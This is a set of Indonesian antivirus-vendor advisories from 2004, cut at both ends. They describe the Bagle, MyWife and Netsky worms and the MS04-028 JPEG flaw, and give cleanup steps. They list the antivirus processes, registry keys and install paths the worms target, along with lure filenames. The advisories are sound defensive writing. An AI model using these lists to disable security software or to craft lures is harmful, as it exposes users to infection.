Menurut pengamatan Vaksincom, pada pukul 16.00, 1 September 2004 ke 131 website tersebut masih belum mengandung file yang dicari oleh Bagle.AK, sehingga tidak akan terjadi update. Tetapi karena setiap 6 jam sekali proses pengecekan akan dilakukan maka tidak tertutup kemungkinan file dengan nama b.jpg tersebut akan diuploadkan ke beberapa dari ke 131 daftar website tersebut sehingga proses update worm akan terjadi. Jika anda bertanya mengapa hanya beberapa website saja yang di update oleh pembuat worm, alasannya adalah untuk menghindari pelacakan oleh pihak berwenang. Selain itu, kemungkinan kedua adalah pembuat Bagle.AK ini melakukan "testing the water", untuk melihat bagaimana pemantauan yang dilakukan dan bagaimana kemungkinan serangan yang efektif di masa depan. Jadi para pengguna internet, bersiaplah untuk serangan berikut yang lebih canggih lagi di masa depan.

Selain itu, Bagle.AK yang dapat menginfeksi Windows 95 / 98 / ME / NT / 2000 / XP dan 2003 ini juga melakukan Pe-Er nya yang lain seperti :

1. Menghapus beberapa program sekuriti dan antivirus antara lain :
    

   ATUPDATER.EXE
   AUPDATE.EXE
   AUTOTRACE.EXE
   AUTOUPDATE.EXE
   FIREWALL.EXE
   ATUPDATER.EXE
   LUALL.EXE
   DRWEBUPW.EXE
   AUTODOWN.EXE
   NUPGRADE.EXE
   OUTPOST.EXE
   ICSSUPPNT.EXE
   ICSUPP95.EXE
   ESCANH95.EXE
   AVXQUAR.EXE
   ESCANHNT.EXE
   UPGRADER.EXE
   AVXQUAR.EXE
   AVWUPD32.EXE
   AVPUPD.EXE
   CFIAUDIT.EXE
   UPDATE.EXE
   NUPGRADE.EXE
   MCUPDATE.EXE

   Vaksincom menyarankan anda untuk berhati-hati atas aksi ini karena antivirus yang dilumpuhkan akan berakibat fatal, karena komputer anda akan terbuka terhadap serangan virus yang paling primitif sekalipun, namun berbahaya seperti CIH atau Magister.

2. Mematikan Internet Connection Sharing dan Internet Connection Firewall pada windows 2000, Windows XP dan Windows 2003.
   Jika anda menggunakan program firewall lain seperti Norman Personal Firewall, Zonealarm atau Blackice akan terhindar dari aksi ini.

Norman Virus Control dengan teknologi Sandbox secara proaktif tanpa memerlukan update dapat mengenali Bagle.AK sebagai W32/Malware. Namun kami tetap menyarankan para pelanggan Vaksincom untuk selalu mengupdate program antivirus anda agar selalu terlindung dari virus baru yang selalu bertambah setiap hari.

salam,

Alfons Tanujaya

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4 / 6-7

Jakarta 12950

Telp : 62-21-526 -787 / 752

http://www.vaksin.com

Email : info@...

W32/MyWife.E@mm       11 September 2004

Giliran pengguna Winzip yang "dikerjai"

Alias : Nyxem.C (Sophos), Blackmal.C (Symantec), Blueworm.F (TrendMicro),

     Hai para pengguna Winzip, berhati-hatilah atas rekayasa sosial dari W32/Mywife.E@mm pada komputer anda dan jangan sekali-kali mengklik lampiran email mencurigakan yang datang disertai dengan gambar JPG porno dan Icon lucu Yahoo Messenger sebelum membaca habis artikel ini. Jika anda lakukan hal diatas, maka dijamin anda akan menjadi korban Mywife.E yang salah satu aksinya adalah melumpuhkan program antivirus dikomputer anda dan akan berusaha mengirimkan dirinya ke alamat email yang didapatkan dari komputer anda, termasuk kontak Yahoo dan MSN Messenger. MyWife.E sudah sampai ke Indonesia sejak tanggal 9 September 2004.

Email dengan gambar porno dan icon Messenger

Email yang mengandung virus MyWife.E akan datang dalam rekayasa yang cukup menarik. Pada Body email, akan diselipkan beberapa Icon lucu (smiley) baik dari MSN Messenger atau dari Yahoo Messenger . Kemungkinan besar harapan dari pembuat MyWife.E ini agar pada pengguna messenger merasa familiar dengan icon-icon tersebut dan tidak curiga pada email tersebut. Icon lucu tersebut dimasukkan ke body email dengan melakukan link langsung ke website Hotmail dan Yahoo Instant Messenger. Sedangkan lampiran yang pada email akan mengandung dua file, file pertama adalah file terkompres yang mengandung virus dan file kedua adalah file JPG dengan nama video1.jpg yang merupakan gambar porno dengan resolusi rendah dan ukuran 8kb.

Alamat email pengirim dipalsukan sehingga anda tidak dapat melacak pengirim email yang asli. Satu hal yang cukup menarik dan perlu menjadi perhatian anda adalah lampiran yang mengandung virus akan datang dalam bentuk file *.zip, *.z, *.gz dan *.tgz. Menurut pemantauan Vaksin.com, MyWife.E ini merupakan virus pertama yang mengirimkan dirinya dengan memanfaatkan Icon MSN & Yahoo Messenger pada bagian Body email (secara online) serta lampiran yang datang dalam format *.z. Hal ini cukup unik mengingat umumnya administrator mailserver memblok semua eksekutable pada mailservernya dan hanya meloloskan *.zip. Jika administrator meloloskan semua lampiran yang terkompres *.zip, *.tgz, *.z atau *.gz maka kemungkinan besar MyWife.E akan berhasil lolos sampai ke mailbox enduser.

MyWife.E akan berusaha mengirimkan dirinya secara massif melalui email ke alamat kontak yang didapatkan dari kontak Yahoo Messenger, MSN Messenger dan file pada komputer lokal yang mengandung alamat email. Adapun sMTP yang digunakan untuk mengirimkan virus akan diambil dari SMTP Outlook (dari registri), jika tidak ada akan dicoba SMTP dari Hotmail dan sebagai cadangan terakhir MyWife.E memiliki daftar SMTP server sendiri untuk mengirimkan dirinya. Adapun teknik yang digunakan untuk memanfaatkan SMTP ini cukup canggih, yaitu dengan cara mendrop "OSSMTP.DLL" yang merupakan komponen Visual Basic untuk mengirimkan email.

Rekayasa lampiran

Lampiran yang mengandung virus MyWife.E memanfaatkan settingan default windows XP yang secara default tidak menampilkan ekstensi file yang sudah dikenali (lihat Gambar)

sehingga file yang sebenarnya file Unix Compress "Nokia6600zip.z" akan terlihat sebagai "Nokia6600zip". Pada sample email yang lain, rekayasa dilakukan dengan teknik spasi panjang, dimana file yang mengandung virus diberi nama "Video_Live.zip  <spasi banyak>  .z" akan ditampilkan pada windows XP sebagai "Video_Live.zip". Setelah dimekarkan, file yang terkompres akan terpecah menjadi empat file dimana salah satunya akan kembali mengandung ekstensi ganda dengan spasi banyak sebagai berikut :

Pada settingan default Windows XP, file dengan ekstensi ganda tersebut akan terlihat seperti file DVD "File-04-Music.DVD" yang jika dijalankan akan membuka Windows Media Player namun tidak ada file yang dijalankan, melainkan malahan akan mengaktifkan virusnya untuk menginfeksi komputer anda.

Menghapus program antivirus baik dari registri dan eksekutable

Hal yang perlu diwaspadai dari MyWife.E ini adalah aksinya melumpuhkan program antivirus dan utilitas sehingga komputer anda menjadi rentan terhadap serangan virus yang paling primitif sekalipun. Adapun software yang dilumpuhkan adalah sebagai berikut :

• TrendMicro / PC Cilin

• McAfee

• Symantec

• Kaspersky

• Deep Freeze

Teknik yang digunakan oleh MyWife.E dalam melumpuhkan aplikasi sekuriti adalah dengan dua metode, yang pertama menghapus kunci registri windows :

_Hazafibb
au.exe
ccApp
defwatch
Explorer
erthgdr
gigabit.exe
JavaVM
KasperskyAv
key
MCUpdateExe
MCAgentExe
McRegWiz
McVsRte
McAfeeVirusScanService
msgsvr32
NPROTECT
NAV Agent
Norton Antivirus AV
OLE
PCClient.exe
PCCIOMON.exe
pccguide.exe
PccPfw
PCCClient.exe
rtvscn95
reg_key
ScriptBlocking
SSDPSRV
system.
Sentry
ssate.exe
Services
tmproxy
Taskmon
Traybar
Task
VirusScan Online
VSOCheckTask
vptray
Windows Services Host
winupd.exe
Windows Update
win_upd.exe
winupdt
wersds.exe

pada alamat registri :

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run\

• HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run\

Yang secara tidak langsung juga mengakibatkan MyWife.E berbuat kebaikan karena kunci registri di atas juga mengaktifkan virus MyDoom.A, Mimail.T dan Bagle.

dan yang kedua menghapus semua file *.exe pada direktori instalasi software antivirus dan sekuriti sebagai berikut :

C:\Program Files\Norton AntiVirus\*.exe
C:\Program Files\McAfee\McAfee VirusScan\Vso\*.*
C:\Program Files\McAfee\McAfee VirusScan\Vso
C:\Program Files\McAfee\McAfee VirusScan\Vs
C:\Program Files\Trend Micro\PC-cillin 2002\*.exe
C:\Program Files\Trend Micro\PC-cillin 2003\*.exe
C:\Program Files\Trend Micro\Internet Security\*.exe
C:\Program Files\NavNT\*.exe
C:\Program Files\HyperTechnologies\Deep Freeze\*.exe

Selain itu, MyWife.E juga akan mengubah registrasi software Winzip pada komputer yang terinfeksi dengan mendaftarkan nama "BlackWorm" sebagai pemilik software dengan nomor SN+2AD00ED*"

Selain kemampuan melumpuhkan program sekuriti, coding MyWife.E diketahui mengandung rutin untuk menghapus file doc, jpg, mdb, psd dan xls. Karena itu, segeralah back up data anda yang penting guna berjaga dari kemungkinan terburuk.

Apa yang harus dilakukan jika komputer anda terinfeksi MyWife.E?

Jika komputer anda sudah terinfeksi MyDoom.O, kami sarankan anda lakukan langkah berikut :

1. Jika Anda menggunakan Windows ME/XP, nonaktifkan system restore selama masa pembersihan

2. Update antivirus yang anda gunakan, jika tidak menggunakan Norman Virus Control dengan teknologi Sandbox anda harus menggunakan update definisi minimal 9 September 2004 untuk mengenali MyWife.E.

3. Jika komputer Anda terhubung ke jaringan, lepaskan terlebih dahulu.

4. Restart komputer di safe mode (pada saat start komputer tekan tombol [F5])

5. Scan dan delete semua file yang terdeteksi sebagai W32/MyWife.E@mm.

6. Balikkan registri yang telah dirubah sebagai berikut :

   Klik [Start] pilih Run dan ketik "regedit" dan tekan [Enter] anda akan membuka Registry Editor

    

   Navigasi pada alamat registri :

   • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
     Pada panel kanan, hapus :

   "(default)" = "C:\winnt\volume\[twunk_32.exe]"
   "(default)" = "C:\winnt\volume\[winhelp.exe]"

   • HKEY_KEY_CURRENT_USER\Software\Nico Mak Computing\WinZip\caution
     Pada panel kanan hapus :
     
     "NoBetaMessage"="1"

    

   • HKEY_KEY_CURRENT_USER\Software\Nico Mak Computing\WinZip\WinIni
     Pada panel kanan hapus :
     
     Name = "BlackWorm"
     SN = "2AD00ED6"

   Keluar dari Registri Editor

PS : Gunakan sarana Forum antivirus Vaksincom untuk mengkonsultasikan masalah virus anda di http://forum.vaksin.com

Alfons Tanujaya

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4 / 6-7

Jakarta 12950

Telp : 62-21-526 -787 / 752

http://www.vakisn.com

Email : info@...

MS 04-028, GDI+ JPEG Vulnerability       23 September 2004

Celah keamanan yang memungkinkan file JPEG menyebarkan virus

       Bulan September tampaknya mempunyai magnit tersendiri untuk munculnya virus baru dan berbahaya, setelah duet Nimda dan CodeRed pada tahun 2001 yang disusul oleh Yahaa dan Bugbear pada tahun 2002 lalu aksi Blaster dan Sobig.F pada September 2003, maka pada tanggal 14 September 2004 muncul kabar "seram" yang mengguncangkan para praktisi keamanan khususnya industri antivirus pengguna internet. Celah keamanan yang memungkinkan virus menginfeksi komputer anda dengan hanya dengan melihat gambar berformat jpeg telah ditemukan, dan tidak tanggung tanggung celah keamanan tersebut terkandung pada OS (Operating System) dan aplikasi Windows. Dimana walaupun anda sudah melakukan patch OS anda dan belum melakukan patch pada aplikasi maka celah keamanan tersebut tetap akan berhasil dieksploitasi. Jika membuat Sasser membutuhkan waktu kurang dari 1 bulan setelah pengumuman celah keamanannya, kami menunggu dengan was-was dan diperkirakan dalam waktu yang sangat dekat virus yang mengeksploitasi celah keamanan ini akan muncul. Para vendor antivirus juga blingsatan setengah mati karena selama ini tidak memasukkan file jpeg sebagai daftar file yang berbahaya dan perlu diwaspadai.

Informasi Teknis

Sumber permasalahan ada pada Microsoft GDI+ (Graphics Device Interface) JPEG (Joint Photographic Experts Group), dimana GDI+ ini merupakan komponen Microsoft yang digunakan untuk memproses gambar dan grafik pada aplikasi dan program. Terjadi kesalahan pada komponen GDI ini dalam memproses file JPEG sehingga file JPEG yang datang dalam bentuk yang telah direkayasa sedemikian rupa akan mengakibatkan Buffer Overflow dan hal ini akan memungkinkan bagi pembuat virus untuk menjalankan kode yang telah dipersiapkan terlebih dahulu pada komputer korban dan sebagai akibatnya, komputer yang menjalankan (membuka) file JPEG tersebut secara teknis akan bisa dikuasai karena kode yang dijalankan bisa apa saja termasuk menghapus data, menambah akses baru atau menjalankan program lain yang telah dipersiapkan terlebih dahulu.

Aplikasi apa saja yang rentan

Jika celah keamanan LSASS dan RPC Dcom yang memungkinkan Sasser dan Blaster "hanya" mampu menyerang OS Windows seperti Win XP, 2000, NT dan 2003 maka celah keamanan GDI+ ini mempunyai cakupan yang jauh lebih besar, boleh dikatakan celah keamanan yang sangat berbahaya dan cakupannya (termasuk) paling luas, dari Operating System seperti Windows 2000, XP dan 2003, sampai aplikasi yang sangat populer seperti Microsoft Office XP, MS Office 2003 dan tidak ketinggalan browser yang paling populer sejagad Internet Explorer 6 SP 1.

Untuk lebih lengkapnya, beberapa OS dan aplikasi yang mengandung celah keamanan GDI +  ini adalah sebagai berikut :

Operating System

• Microsoft Windows XP dan Microsoft Windows XP Service Pack 1

• Microsoft Windows XP 64-Bit Edition Service Pack 1 dan Microsoft Windows XP 64-Bit Edition Version 2003

• Microsoft Windows Server™ 2003 – Download the update

• Microsoft Windows Server 2003 64-Bit Edition – Download the update

Aplikasi

• Internet Explorer 6, SP 1

• Microsoft Office XP Service Pack 3

• Microsoft Office XP Service Pack 3 Software:
  Outlook® 2002
  Word 2002
  Excel 2002
  PowerPoint® 2002
  FrontPage® 2002
  Publisher 2002

• Microsoft Office 2003

• Microsoft Office 2003 Software:
  Outlook® 2003
  Word 2003
  Excel 2003
  PowerPoint® 2003
  FrontPage® 2003
  Publisher 2003
  InfoPath™ 2003
  OneNote™ 2003

• Microsoft Project 2002 Service Pack 1 (semua versi)

• Microsoft Project 2003 (semua versi)

• Microsoft Visio 2002 Service Pack 2 (semua versi)

• Microsoft Visio 2003 (semua versi)

• Microsoft Visual Studio .NET 2002

• Microsoft Visual Studio .NET 2002 Software:
  Visual Basic .NET Standard 2002
  Visual C# .NET Standard 2002
  Visual C++ .NET Standard 2002

• Microsoft Visual Studio .NET 2003

• Microsoft Visual Studio .NET 2003 Software:
  Visual Basic .NET Standard 2003
  Visual C# .NET Standard 2003
  Visual C++ .NET Standard 2003
  Visual J# .NET Standard 2003

• The Microsoft .NET Framework versi 1.0 SDK Service Pack 2

• Microsoft Picture It!® 2002 (semua versi)

• Microsoft Greetings 2002

• Microsoft Picture It! version 7.0 (semua versi)

• Microsoft Digital Image Pro version 7.0

• Microsoft Picture It! version 9 (semua versi, termasuk Picture It! Library)

• Microsoft Digital Image Pro version 9

• Microsoft Digital Image Suite version 9

• Microsoft Producer for Microsoft Office PowerPoint (semua versi)

• Microsoft Platform SDK Redistributable: GDI+

Sedangkan aplikasi yang tidak rentan secara "default" (rentan sejak pertama kali instal) adalah sebagai berikut :

Operating System

• Microsoft Windows NT Server 4.0 Service Pack 6a

• Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6

• Microsoft Windows 2000 Service Pack 3, Microsoft Windows 2000 Service Pack 4

• Microsoft Windows XP Service Pack 2

• Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE)

• Microsoft Windows Millennium Edition (Me)

Aplikasi

• Microsoft Office 2003 Service Pack 1

• Microsoft Office 2000

• Microsoft Visio 2003 Service Pack 1

• Microsoft Visio 2000

• Microsoft Project 2003 Service Pack 1

• Microsoft Project 2000

• Microsoft Digital Image Suite 10, Microsoft Digital Image Pro 10, Picture It! Premium 10

• Internet Explorer 5.01 Service Pack 3 pada Windows 2000 Service Pack 3

• Internet Explorer 5.01 Service Pack 4 pada Windows 2000 Service Pack 4

• Internet Explorer 5.5 Service Pack 2 pada Microsoft Windows Millennium Edition

• The Microsoft .NET Framework version 1.0 Service Pack 3

• The Microsoft .NET Framework version 1.1 Service Pack 1

• The Microsoft .NET Framework version 1.1 Service Pack 1 for Windows Server 2003

PENTING !!

1. Anda harus melakukan Path pada "semua" komponen yang rentan, baik Operating System DAN Aplikasi. Sebagai contoh, jika anda menggunakan Windows 98 yang secara teknis tidak rentan atas GDI+ Exploit ini namun anda menggunakan Microsoft Office XP Service Pack 3 yang rentan atas GDI Exploit, maka jika aplikasi Office anda membuka file JPEG yang mengeksploitasi celah keamanan ini komputer anda akan berhasil ditaklukkan.

2. Demikian pula sebaliknya, jika anda menggunakan Microsoft Office Service Pack 1 yang tidak rentan namun dijalankan pada WIndows XP Service Pack 1 yang rentan, maka sistem anda tetap akan berhasil dieksploitasi jika membuka file JPEG karena OS Windows XP memiliki kemampuan untuk menjalankan GDI+ sendiri.

3. Meskipun Operating system anda dan Aplikasi yang disebutkan di atas sudah di patch, hal ini "tidak menjamin" sistem anda bebas dari eksploitasi GDI+ JPEG ini karena jika anda menjalankan aplikasi pihak ke tiga yang menggunakan GDI+ ini dan belum di patch, maka sistem anda akan berhasil dieksploitasi :(.

Bagaimana cara mengatasinya

Bagi anda yang menggunakan aplikasi dan OS yang kami sebutkan di atas, kami "sangat" sarankan untuk mengupdate sistem anda segera. Untuk informasi detail silahkan akses ke :

http://www.microsoft.com/technet/security/bulletin/MS04-028.mspx dan lakukan download sesuai dnegan konfigurasi sitem yang anda miliki.

Bagi semua pelanggan Vaksincom, patching akan diberikan secara gratis oleh PT. Vaksincom pada kunjungan rutin bulanan dan untuk mendapatkan kunjungan patching Gratis "segera" oleh teknisi Vaksincom silahkan melakukan koordinasi dengan bagian Customer Service ibu Dewi.

PT. Vaksincom mengeluarkan peringatan kepada seluruh pengguna internet Indonesia untuk berhati-hati karena menurut pemantauan kami, POC (Proof of Concept) atas eksploitasi GDI+ ini sudah berhasil dan beredar di internet. Diperkirakan dalam waktu yang tidak terlalu lama virsus yang berhasil mengeksploitasi celah keamanan ini akan beredar.

salam,

Alfons Tanujaya (AAT)

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4 / 6-7

Jakarta 12950

Telp : 62-21-526 -787 / 752

http://www.vaksin.com

Email : info@...

W32/Netsky.AD@mm          15 Oktober 2004

Varian Netsky berbahasa Portugis dengan icon bendera Brazil

Alias : WORM_NETSKY.AF, I-Worm.NetSky.b, W32/Netsky.ag@MM, W32.Netsky.AF@mm

     Seperti film mafia dimana walaupun boss mafianya sudah tertangkap dan dipenjara namun organisasi mafia tersebut tetap berjalan, demikian halnya dengan virus Netsky. Cukup mengherankan ada varian Netsky baru yang keluar lagi setelah tertangkapnya "boss" pembuat Netsky (Sven Jaschan) yang seharusnya mengakibatkan terhentinya produksi varian baru dari Netsky. Pertanyaannya adalah siapa yang menyebarkan varian baru ini ? Menurut pengamatan Vaksincom, varian Netsky.AD ini sangat mirip dengan Netsky.B dimana beberapa vendor antivirus bahkan mendeteksinya sebagai Netsky.B karena kharakteristiknya memang sangat mirip dengan Netsky.B kecuali ciri khas Netsky.AD yang berbahasa Portugis.

Penyebarannya cukup meluas dengan ciri khas icon mirip bendera Brazil

Meskipun email yang mengandung Netsky.AD ini datang dalam lampiran dan subjek yang berbahasa Portugis, tetapi penyebarannya cukup meluas di seluruh dunia, termasuk Indonesia. Vaksincom menerima konfirmasi serangan Netsky.AD yang pertama pada tanggal 14 Oktober 2004 dan meningkat pada hari berikutnya tanggal 15 Oktober 2004 sehingga memasukkan virus ini pada kategori yang perlu diwaspadai dengan tingkat resiko rendah. Adapun email yang mengandung Netsky.AD akan datang dengan perincian sebagai berikut (lihat gambar 1) :

Email Pengirim : dipalsukan

Subjek dan Bodi email dalam bahasa Portugis. Adapun beberapa contoh subjek, isi email dan lampiran yang mengandung Netsky.AD adalah sebagai berikut :

0123456789
war3!
AIDS!
jogo!
vips!
email
:(
brasil!
docs
:D
voce
:-)
???
Sua saude esta bem?
morto
:)

Isi Email :

sinto voce!!
Hackers do Brasil
Medical Labs Exames!!!
Surto :(
Policia SP
arquivo zipado PGP???
ve ai logo ta
AMA!
Abra rapido isso!!!!
veja detalhes!!!
PizzaVeneza!

Lampiran :

AIDS!
LINUSTOR
bingos!
brasil!
circular
contas!!
docs
email
loterias
voce
war3!

dengan ekstensi :

.bat
.com
.pif
.scr
.zip

jika memiliki ekstensi .zip, isi dari lampiran .zip tersebut akan mengandung virus dan ekstensi yang dikandungnya bisa tunggal atau ekstensi ganda :

.doc
.htm
.rtf
.txt

diikuti :

.bat
.com
.pif
.scr

Jika penerima email menjalankan lampiran yang diterimanya, ia akan menerima pesan error (lihat gambar 2) :

dan tanpa disadarinya virus Netsky.AD sudah menginfeksi komputernya dan menjalankan aksinya dengan mengubah beberapa registri untuk menjalankan dirinya secara otomatis serta tidak lupa mematikan beberapa aplikasi windows (Task Monitor dan Explorer) serta satu program antivirus (Kaspersky) dengan menghapus registrinya dan menempatkan dirinya pada direktori windows dengan nama MsnMsgrs.exe (memalsukan diri sebagai aplikasi MSN Messenger) dengan icon unik mirip bendera Brazil . Selain itu, guna mendukung penyebarannya yang massal lewat email, seperti varian Netsky yang lainnya maka penyebaran melalui jaringan juga dilakukan dengan sangat aktif. Semua direktori pada drive c: s/d z: (kecuali drive CD Rom)  yang mengandung kata "share" atau "sharing" akan dikopikan virus Netsky.AD yang berukuran 31 KB dengan nama file sebagai berikut :

aninha gatinha!.zip.scr
barrio.scr
cafe!!.zip.scr
Canaval2004!.jpg.pif
Carnaval em Salvador!!.zip.scr
caspa.scr
celulares!!.zip.scr
clica ai logo meu.scr
comoserrico!.zip.scr
importante!!!!!.zip.scr
minhavida!.zip.exe
MulataDandoOcujpg.scr
multas.pif
paula!.scr
puteiros!!.scr
receitas de bolo!!.zip.scr
rede globo tv!.zip.scr
ResidentEvil2.zip.scr
rocha.scr
traficoemSP!.scr
vadias peladas!!.scr
vida!!.zip.scr
VivaNaBaia!.scr
vota!.zip.scr

Akibat dari aksinya ini adalah ancaman terhadap pengguna komputer lain dalam jaringan yang tertarik dan mengklik file yang disharing dan juga pengguna P2P seperti Kazaa sehingga Netsky.AD juga memiliki kemampuan menyebarkan dirinya melalui email dan P2P / jaringan lokal. Menurut pengetesan yang dilakukan oleh Vaksincom, copy dari file yang dimasukkan dalam satu insiden sangat banyak, mencapai > 4.000 copy worm per komputer sehingga dapat dikatakan worm ini sangat produktif dan kemungkinan pengguna jaringan lain untuk terinfeksi melalui file sharing cukup besar, apalagi icon dari file tersebut juga cukup menarik, mirip bendera Brazil dengan warna dasar hijau dan kuning (lihat gambar 3).

Karena itulah Vaksincom menyarankan para pengguna internet untuk berhati-hati dan tidak sembarangan menjalankan file khususnya dari Peer to Peer sharing seperti Kazaa, Morpheus. Termasuk berhati-hati untuk tidak menjalankan sembarang file dari jaringan. Selain itu, jagalah selalu agar komputer anda selalu menggunakan program antivirus yang terupdate agar dapat mengenali ancaman virus terakhir seperti Netsky.AD. Norman Virus Control dengan update per tanggal 14 Oktober 2004 dapat mengenali Netsky.AD ini dengan baik.

salam,

Alfons Tanujaya (AAT)

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4 / 6-7

Jakarta 12950

Telp : 62-21-526 -787 / 752

http://www.vaksin.com

Email : info@...

W32/Bagle.AQ - Bagle.AR@mm              30 Oktober 2004

Hati-hati dengan attachment .cpl

       Setelah cukup lama tidak membuat kehebohan, pembuat Bagle kembali menjalankan aksinya dengan menyebarkan varian baru pada hari Jum'at, 29 Oktober 2004. Hari Jum'at merupakan waktu favorit bagi pembuat virus untuk menyebarkan "ciptaannya" karena merupakan awal weekend, sehingga virus mempunyai waktu yang cukup panjang untuk menyebarkan dirinya (khususnya melalui komputer yang menyala terus dan terhubung menggunakan broadband) dan akan mendapatkan dampak maksimal penyebarannya pada saat semua orang mulai bekerja pada hari Senin. Virus ini menyebar tidak memanfaatkan lampiran .zip tetapi memanfaatkan 4 lampiran salah satunya adalah .cpl yang kemungkinan besar akan diloloskan dari lampiran yang diblok mailserver. Karena itu harap anda berhati-hati khususnya jika menerima email dengan lampiran .cpl (Control Panel).

Detail email

Email yang mengandung Bagle.AQ dan AR akan datang dengan alamat pengirim yang dipalsukan, sehingga kami tidak menyarankan anda untuk mengabaikan alamat pengirim email tersebut. Selain itu, anda juga akan mengalami kesulitan mengenali virus ini dari ukurannya karena sangat bervariasi. Yang perlu anda perhatikan adalah Subjek, Isi email dan lampiran. Karena variasinya sedikit, anda dapat mengenali email Bagle ini sebagai berikut (lihat gambar 1) :

Gambar 1. Contoh Virus Bagle.AQ / AR

Nama Pengirim / From  : Dipalsukan

Ukuran Lam

Subjek :

Re:
Re: Hello
Re: Thank you!
Re: Thanks :)
Re: Hi

Isi Email :

:)
:))

Lampiran :

Price
price
Joke

dengan ekstensi :

.exe
.scr
.com
.cpl

Yang perlu diperhatikan adalah lampiran yang datang dalam format .cpl, karena kemungkinan besar lampiran dalam format .exe, .scr dan .com sudah diblok oleh administrator di mailserver. .cpl adalah file untuk komponen sistem windows Control Panel (lihat gambar 2).

Gambar 2, Control Panel Windows

Menyebarkan diri melalui Sharing

Satu hal yang sangat cerdik dimanfaatkan oleh Netsky dan Bagle dalam menyebarkan dirinya melalui jaringan / Peer to Peer adalah dengan mengkopikan dirinya ke semua direktori yang mengandung nama "shar". Kami katakan cerdik karena pembuat virus tidak perlu memeras otaknya untuk mengirimkan virus ke komputer lain di jaringan seperti Opaserv, tetapi cukup mengkopikan diri ke direktori yang selalu digunakan untuk sharing dalam jaringan dan dan digunakan oleh aplikasi Peer to Peer yang sangat populer. Direktori lokal yang mengandung kata "shar" tersebut antara lain "Shared", "Microsoft Shared", "Shared Dir" atau "AVP Shared".

Sedangkan program Peer to Peer yang menggunakan kata "shar" dalam direktorynya antara lain Kazaa dan Morpheus dengan nama "My Shared Folder".

Untuk menarik perhatian orang menjalanak dirinya, Bagle.AQ memberikan nama yang menarik pada file yang mengandung virus dan diletakkan pada folder yang kami sebutkan di atas. Adapun nama file tersebut adalah sebagai berikut :

ACDSee 9.exe
Adobe Photoshop 9 full.exe
Ahead Nero 7.exe
KAV 5.0
Kaspersky Antivirus 5.0
Matrix 3 Revolution English Subtitles.exe
Microsoft Office 2003 Crack, Working!.exe
Microsoft Office XP working Crack, Keygen.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Opera 8 New!.exe
Porno Screensaver.scr
Porno pics arhive, xxx.exe
Porno, sex, oral, anal cool, awesome!!.exe
Serials.txt.exe
WinAmp 5 Pro Keygen Crack Update.exe
WinAmp 6 New!.exe
Windown Longhorn Beta Leak.exe
Windows Sourcecode update.doc.exe
XXX hardcore images.exe

Melumpuhkan program sekuriti dan membuka port TCP 81.

Aksi Bagle.AQ yang cukup berbahaya adalah ia akan berusaha melumpuhkan beberapa program sekuriti seperti Zone Labs, Panda, Norton Antivirus, Kaspersky, TinyAV dan SkynetRevenge (virus Netsky) dengan cara menghapus string aplikasi dari registri. Selain itu, proses aplikasi yang sedang berjalan seperti :

APVXDWIN.EXE
ATUPDATER.EXE
AUPDATE.EXE
AUTODOWN.EXE
AUTOTRACE.EXE
AUTOUPDATE.EXE
AVENGINE.EXE
AVPUPD.EXE
AVWUPD32.EXE
AVXQUAR.EXE
Avconsol.exe
Avsynmgr.exe
CFIAUDIT.EXE
DRWEBUPW.EXE
DefWatch.exe
ESCANH95.EXE
ESCANHNT.EXE
FIREWALL.EXE
FrameworkService.exe
ICSSUPPNT.EXE
ICSUPP95.EXE
LUALL.EXE
LUCOMS~1.EXE
MCUPDATE.EXE
NISUM.EXE
NPROTECT.EXE
NUPGRADE.EXE
OUTPOST.EXE
PavFires.exe
Rtvscan.exe
RuLaunch.exe
SAVScan.exe
SHSTAT.EXE
SNDSrvc.exe
UPDATE.EXE
UpdaterUI.exe
VsStat.exe
VsTskMgr.exe
Vshwin32.exe
alogserv.exe
blackd.exe
ccApp.exe
ccEvtMgr.exe
ccProxy.exe
ccPxySvc.exe
mcagent.exe
mcshield.exe
mcvsescn.exe
mcvsrte.exe
mcvsshld.exe
navapsvc.exe
navapw32.exe
nopdb.exe
pavProxy.exe
pavsrv50.exe
symlcsvc.exe

juga akan dimatikan. Bagle.AQ juga akan membuka port TCP 81 untuk mengaktifkan backdoor. Pada varian Bagle yang sebelumnya, pembukaan port ini dimanfaatkan oleh pembuat Bagle untuk menyebarkan vairan yang berikutnya dan terkadang mengambil alih komputer yang terinfeksi virus dan menggunakannya untuk kegiatan spamming (spam server).

Berusaha mendownload file G.jpg

Ada aktivitas menarik dari Bagle.AQ dimana ia akan berusaha mendownload file jpg dari 146 website. Pada saat pembuatan artikel ini, ke 146 link website tersebut tidak aktif. Jik pada varian sebelumnya kegiatan download file ini digunakan untuk mengupdate dirinya (seperti antivirus) maka dikhawatirkan jika website tersebut aktif, maka Bagle.AQ memiliki kemampuan mengupdate dirinya.

Apa Beda Bagle.AQ dan AR

Bagle.AQ dan AR ini sama 99 %, perbedaannya adalah pada saat proses infeksi ke komputer korban, Bagle.AR akan berusaha menghapus virus Netsky pada komputer yang terinfeksi. Seperti kita ketahui, pembuat Bagle dan Netsky saling menyerang dan melumpuhkan dan pertempuran dimenangkan oleh Netsky yang mampu menyebarkan dirinya secara luarbiasa dan mengakibatkan lebih dari 50 % bandwidth email mengandung virus Netsky. Namun dengan tertangkapnya pembuat Netsky, otomatis tidak ada lagi yang membasmi Bagle dan jika hal ini berjalan terus siperkirakan dlaam waktu yang tidak terlalu lama virus Bagle yang akan merajai dalam Top 10 virus dunia.

Infeksi Bagle di Indonesia dan penaggulangannya

